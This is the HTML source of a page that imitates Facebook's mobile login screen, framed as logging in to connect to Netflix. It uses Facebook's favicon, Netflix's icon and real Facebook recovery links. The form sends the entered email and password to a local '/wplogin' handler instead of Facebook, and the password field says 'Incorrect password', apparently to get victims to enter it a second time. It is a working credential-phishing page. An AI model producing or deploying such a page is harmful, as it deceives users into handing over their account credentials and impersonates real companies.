<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="login.css">
    <title>Facebook</title>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3/yj/r/gB76kJXPYJV.png" rel="shortcut icon">
</head>
<body>
    <nav>
        <h1>facebook</h1>
    </nav>
    <div style=" padding: 0 16px;">
        <div class="lzv">
            <img class="logo" src="https://assets.nflxext.com/us/ffe/siteui/common/icons/nficon2016.png" alt="" />
            <p class="text">Log in to your Facebook account <br> to connect to Netflix</p>
        </div>
        <form action="/wplogin" method="POST">
            <div style="    padding-bottom: 1px;
    padding-top: 8px;"><input class="email" name="email" placeholder="Mobile number or email address" type="text">
            <input class="pass wp" name="pass" placeholder="Incorrect password" type="password">
            <button type="submit" class="login">Log In</button>
        </div>
        </form>
        <div class="fp"><a class="fp"
            href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0">Forgotten
            Password?</a></div>
        <p class="ca">Create account</p>
        <p class="nn">Not now</p>
        <p class="hp">Help Center</p>
    </div>
    <div class="language">
        <div class="sec">
            <li class="bu">English (UK)</li>
            <li>हिन्दी</li>
            <li>ગુજરાતી</li>
            <li>ਪੰਜਾਬੀ</li>
        </div>
        <div class="sec">
            <li>मराठी</li>
            <li>اردو</li>
            <li>ಕನ್ನಡ</li>
            <li class="p">+</li>
        </div>
    </div>
    <p class="fot">Meta © 2022</p>
</body>

</html>